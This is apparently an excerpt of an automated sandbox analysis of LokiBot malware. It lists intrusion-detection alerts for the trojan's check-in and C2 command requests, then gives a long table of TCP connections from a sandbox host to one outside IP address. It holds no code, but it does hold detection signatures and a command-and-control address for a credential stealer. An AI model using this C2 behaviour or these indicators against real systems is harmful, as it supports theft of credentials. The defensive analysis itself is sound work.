                  2024-09-25T15:30:30.428677+02002025381ET MALWARE LokiBot Checkin1192.168.2.455996188.114.96.380TCP
                  2024-09-25T15:30:30.428677+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455996188.114.96.380TCP
                  2024-09-25T15:30:31.121473+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455996188.114.96.380TCP
                  2024-09-25T15:30:31.121473+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455996188.114.96.380TCP
                  2024-09-25T15:30:31.126338+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455996TCP
                  2024-09-25T15:30:31.273028+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455997188.114.96.380TCP
                  2024-09-25T15:30:31.273028+02002025381ET MALWARE LokiBot Checkin1192.168.2.455997188.114.96.380TCP
                  2024-09-25T15:30:31.273028+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455997188.114.96.380TCP
                  2024-09-25T15:30:31.982949+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455997188.114.96.380TCP
                  2024-09-25T15:30:31.982949+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455997188.114.96.380TCP
                  2024-09-25T15:30:31.987764+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455997TCP
                  2024-09-25T15:30:32.135559+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455998188.114.96.380TCP
                  2024-09-25T15:30:32.135559+02002025381ET MALWARE LokiBot Checkin1192.168.2.455998188.114.96.380TCP
                  2024-09-25T15:30:32.135559+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455998188.114.96.380TCP
                  2024-09-25T15:30:32.891448+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455998188.114.96.380TCP
                  2024-09-25T15:30:32.891448+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455998188.114.96.380TCP
                  2024-09-25T15:30:32.896266+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455998TCP
                  2024-09-25T15:30:33.256022+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455999188.114.96.380TCP
                  2024-09-25T15:30:33.256022+02002025381ET MALWARE LokiBot Checkin1192.168.2.455999188.114.96.380TCP
                  2024-09-25T15:30:33.256022+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455999188.114.96.380TCP
                  2024-09-25T15:30:33.917047+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455999188.114.96.380TCP
                  2024-09-25T15:30:33.917047+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455999188.114.96.380TCP
                  2024-09-25T15:30:33.921906+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455999TCP
                  2024-09-25T15:30:34.073488+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.456000188.114.96.380TCP
                  2024-09-25T15:30:34.073488+02002025381ET MALWARE LokiBot Checkin1192.168.2.456000188.114.96.380TCP
                  2024-09-25T15:30:34.073488+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.456000188.114.96.380TCP
                  2024-09-25T15:30:35.635959+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.456000188.114.96.380TCP
                  2024-09-25T15:30:35.635959+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.456000188.114.96.380TCP
                  2024-09-25T15:30:35.638685+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.456000TCP
                  2024-09-25T15:30:35.801198+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.456001188.114.96.380TCP
                  2024-09-25T15:30:35.801198+02002025381ET MALWARE LokiBot Checkin1192.168.2.456001188.114.96.380TCP
                  2024-09-25T15:30:35.801198+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.456001188.114.96.380TCP
                  2024-09-25T15:30:36.512575+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.456001188.114.96.380TCP
                  2024-09-25T15:30:36.512575+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.456001188.114.96.380TCP
                  2024-09-25T15:30:36.517408+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.456001TCP
                  2024-09-25T15:30:37.771542+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.456002188.114.96.380TCP
                  2024-09-25T15:30:37.771542+02002025381ET MALWARE LokiBot Checkin1192.168.2.456002188.114.96.380TCP
                  2024-09-25T15:30:37.771542+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.456002188.114.96.380TCP
                  2024-09-25T15:30:38.532750+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.456002188.114.96.380TCP
                  2024-09-25T15:30:38.532750+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.456002188.114.96.380TCP
                  2024-09-25T15:30:38.539438+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.456002TCP
                  2024-09-25T15:30:38.713862+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.456003188.114.96.380TCP
                  2024-09-25T15:30:38.713862+02002025381ET MALWARE LokiBot Checkin1192.168.2.456003188.114.96.380TCP
                  2024-09-25T15:30:38.713862+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.456003188.114.96.380TCP
                  2024-09-25T15:30:39.444328+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.456003188.114.96.380TCP
                  2024-09-25T15:30:39.444328+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.456003188.114.96.380TCP
                  2024-09-25T15:30:39.450411+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.456003TCP
                  2024-09-25T15:30:39.594556+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.456004188.114.96.380TCP
                  2024-09-25T15:30:39.594556+02002025381ET MALWARE LokiBot Checkin1192.168.2.456004188.114.96.380TCP
                  2024-09-25T15:30:39.594556+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.456004188.114.96.380TCP
                  2024-09-25T15:30:40.283415+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.456004188.114.96.380TCP
                  2024-09-25T15:30:40.283415+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.456004188.114.96.380TCP
                  2024-09-25T15:30:40.288333+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.456004TCP
                  2024-09-25T15:30:40.433961+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.456005188.114.96.380TCP
                  2024-09-25T15:30:40.433961+02002025381ET MALWARE LokiBot Checkin1192.168.2.456005188.114.96.380TCP
                  2024-09-25T15:30:40.433961+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.456005188.114.96.380TCP
                  2024-09-25T15:30:41.170973+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.456005188.114.96.380TCP
                  2024-09-25T15:30:41.170973+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.456005188.114.96.380TCP
                  2024-09-25T15:30:41.175888+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.456005TCP
                  2024-09-25T15:30:41.413983+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.456006188.114.96.380TCP
                  2024-09-25T15:30:41.413983+02002025381ET MALWARE LokiBot Checkin1192.168.2.456006188.114.96.380TCP
                  2024-09-25T15:30:41.413983+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.456006188.114.96.380TCP
                  2024-09-25T15:30:42.064291+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.456006188.114.96.380TCP
                  2024-09-25T15:30:42.064291+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.456006188.114.96.380TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 25, 2024 15:28:36.795984983 CEST4973080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:36.801367044 CEST8049730188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:36.801580906 CEST4973080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:36.803759098 CEST4973080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:36.808682919 CEST8049730188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:36.808752060 CEST4973080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:36.813646078 CEST8049730188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:37.469983101 CEST8049730188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:37.472171068 CEST8049730188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:37.472265959 CEST4973080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:37.472985983 CEST4973080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:37.477950096 CEST8049730188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:37.774975061 CEST4973180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:37.779892921 CEST8049731188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:37.779988050 CEST4973180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:37.782362938 CEST4973180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:37.787173033 CEST8049731188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:37.787247896 CEST4973180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:37.792136908 CEST8049731188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:38.475661993 CEST8049731188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:38.475893021 CEST4973180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:38.475908995 CEST8049731188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:38.475960016 CEST4973180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:38.480813026 CEST8049731188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:38.537806988 CEST4973280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:38.542804003 CEST8049732188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:38.542886972 CEST4973280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:38.544929028 CEST4973280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:38.549771070 CEST8049732188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:38.549981117 CEST4973280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:38.554918051 CEST8049732188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:39.240874052 CEST8049732188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:39.241107941 CEST4973280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:39.241555929 CEST8049732188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:39.241648912 CEST4973280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:39.246004105 CEST8049732188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:39.410409927 CEST4973380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:39.415328979 CEST8049733188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:39.415407896 CEST4973380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:39.417495012 CEST4973380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:39.422280073 CEST8049733188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:39.422339916 CEST4973380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:39.427262068 CEST8049733188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:40.175534010 CEST8049733188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:40.175553083 CEST8049733188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:40.175614119 CEST4973380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:40.175663948 CEST4973380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:40.181087971 CEST8049733188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:40.322012901 CEST4973480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:40.327088118 CEST8049734188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:40.327199936 CEST4973480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:40.329387903 CEST4973480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:40.334189892 CEST8049734188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:40.334278107 CEST4973480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:40.339200020 CEST8049734188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.113013983 CEST8049734188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.113235950 CEST4973480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.115155935 CEST8049734188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.115250111 CEST4973480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.118035078 CEST8049734188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.259355068 CEST4973580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.265642881 CEST8049735188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.265758991 CEST4973580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.267832994 CEST4973580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.272813082 CEST8049735188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.272882938 CEST4973580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.277914047 CEST8049735188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.990243912 CEST8049735188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.990382910 CEST4973580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.991692066 CEST8049735188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:41.991744995 CEST4973580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:41.995244980 CEST8049735188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.142637014 CEST4973680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:42.147733927 CEST8049736188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.147967100 CEST4973680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:42.149990082 CEST4973680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:42.154841900 CEST8049736188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.154915094 CEST4973680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:42.159766912 CEST8049736188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.844978094 CEST8049736188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.845237970 CEST4973680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:42.846381903 CEST8049736188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.846435070 CEST4973680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:42.850104094 CEST8049736188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.993716002 CEST4973780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:42.998670101 CEST8049737188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:42.998744965 CEST4973780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:43.000952959 CEST4973780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:43.005825996 CEST8049737188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:43.005872011 CEST4973780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:43.010694027 CEST8049737188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:43.869628906 CEST8049737188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:43.869837999 CEST4973780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:43.869956017 CEST8049737188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:43.869997978 CEST4973780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:43.875473022 CEST8049737188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.012356043 CEST4973880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.017435074 CEST8049738188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.017508984 CEST4973880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.019629002 CEST4973880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.024411917 CEST8049738188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.024460077 CEST4973880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.029251099 CEST8049738188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.707027912 CEST8049738188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.707278013 CEST4973880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.708445072 CEST8049738188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.708491087 CEST4973880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.712136030 CEST8049738188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.852952003 CEST4973980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.857894897 CEST8049739188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.857985973 CEST4973980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.860066891 CEST4973980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.864907026 CEST8049739188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:44.864953041 CEST4973980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:44.869745016 CEST8049739188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:45.626015902 CEST8049739188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:45.626257896 CEST4973980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:45.627823114 CEST8049739188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:45.627887011 CEST4973980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:45.631217957 CEST8049739188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:45.782255888 CEST4974080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:45.787251949 CEST8049740188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:45.787343025 CEST4974080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:45.789467096 CEST4974080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:45.794411898 CEST8049740188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:45.794466972 CEST4974080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:45.799334049 CEST8049740188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:46.435095072 CEST8049740188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:46.435200930 CEST4974080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:46.436178923 CEST8049740188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:46.436228991 CEST4974080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:46.440257072 CEST8049740188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:46.574280977 CEST4974180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:46.579329967 CEST8049741188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:46.579427958 CEST4974180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:46.581696033 CEST4974180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:46.586535931 CEST8049741188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:46.586604118 CEST4974180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:46.591473103 CEST8049741188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:47.271536112 CEST8049741188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:47.272280931 CEST4974180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:47.272300959 CEST8049741188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:47.274977922 CEST4974180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:47.278218985 CEST8049741188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:47.446990013 CEST4974380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:47.451935053 CEST8049743188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:47.452121973 CEST4974380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:47.454394102 CEST4974380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:47.459290981 CEST8049743188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:47.459805965 CEST4974380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:47.464634895 CEST8049743188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:48.160701036 CEST8049743188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:48.160931110 CEST4974380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:48.161962986 CEST8049743188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:48.162698030 CEST4974380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:48.165786982 CEST8049743188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:48.309005976 CEST4974580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:48.321774006 CEST8049745188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:48.321847916 CEST4974580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:48.324156046 CEST4974580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:48.329097986 CEST8049745188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:48.329147100 CEST4974580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:48.334855080 CEST8049745188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.039150953 CEST8049745188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.039252043 CEST4974580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.039840937 CEST8049745188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.039882898 CEST4974580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.044212103 CEST8049745188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.186640024 CEST4974780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.191790104 CEST8049747188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.191864014 CEST4974780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.194071054 CEST4974780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.198956966 CEST8049747188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.199141979 CEST4974780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.203989983 CEST8049747188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.977329969 CEST8049747188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.978431940 CEST8049747188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:49.978517056 CEST4974780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.978568077 CEST4974780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:49.983395100 CEST8049747188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:50.175436974 CEST4974980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:50.180425882 CEST8049749188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:50.180486917 CEST4974980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:50.183876991 CEST4974980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:50.188741922 CEST8049749188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:50.188831091 CEST4974980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:50.193696022 CEST8049749188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:50.951734066 CEST8049749188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:50.951996088 CEST8049749188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:50.952045918 CEST4974980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:50.952045918 CEST4974980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:50.956866980 CEST8049749188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.089889050 CEST5589080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.095062971 CEST8055890188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.095141888 CEST5589080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.097384930 CEST5589080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.102354050 CEST8055890188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.102415085 CEST5589080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.109996080 CEST8055890188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.830784082 CEST8055890188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.830924034 CEST5589080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.831043959 CEST8055890188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.831104040 CEST5589080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.835886955 CEST8055890188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.980936050 CEST5589280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.985852003 CEST8055892188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.986074924 CEST5589280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.987924099 CEST5589280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.992711067 CEST8055892188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:51.992772102 CEST5589280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:51.997621059 CEST8055892188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:52.731527090 CEST8055892188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:52.731555939 CEST8055892188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:52.731636047 CEST5589280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:52.731671095 CEST8055892188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:52.731698990 CEST5589280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:52.731728077 CEST5589280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:52.736495972 CEST8055892188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:52.867918968 CEST5589380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:52.872875929 CEST8055893188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:52.874725103 CEST5589380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:52.876682997 CEST5589380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:52.881469965 CEST8055893188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:52.881678104 CEST5589380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:52.886524916 CEST8055893188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:53.549809933 CEST8055893188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:53.550543070 CEST8055893188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:53.550695896 CEST5589380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:53.550755978 CEST5589380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:53.555609941 CEST8055893188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:53.714428902 CEST5589480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:53.719377041 CEST8055894188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:53.719665051 CEST5589480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:53.721658945 CEST5589480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:53.726501942 CEST8055894188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:53.727655888 CEST5589480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:53.732451916 CEST8055894188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:54.379558086 CEST8055894188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:54.379847050 CEST5589480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:54.381952047 CEST8055894188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:54.382040977 CEST5589480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:54.384675026 CEST8055894188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:54.525326967 CEST5589580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:54.530510902 CEST8055895188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:54.530628920 CEST5589580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:54.532691956 CEST5589580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:54.537664890 CEST8055895188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:54.537764072 CEST5589580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:54.542612076 CEST8055895188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:55.229852915 CEST8055895188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:55.230196953 CEST5589580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:55.230751991 CEST8055895188.114.96.3192.168.2.4
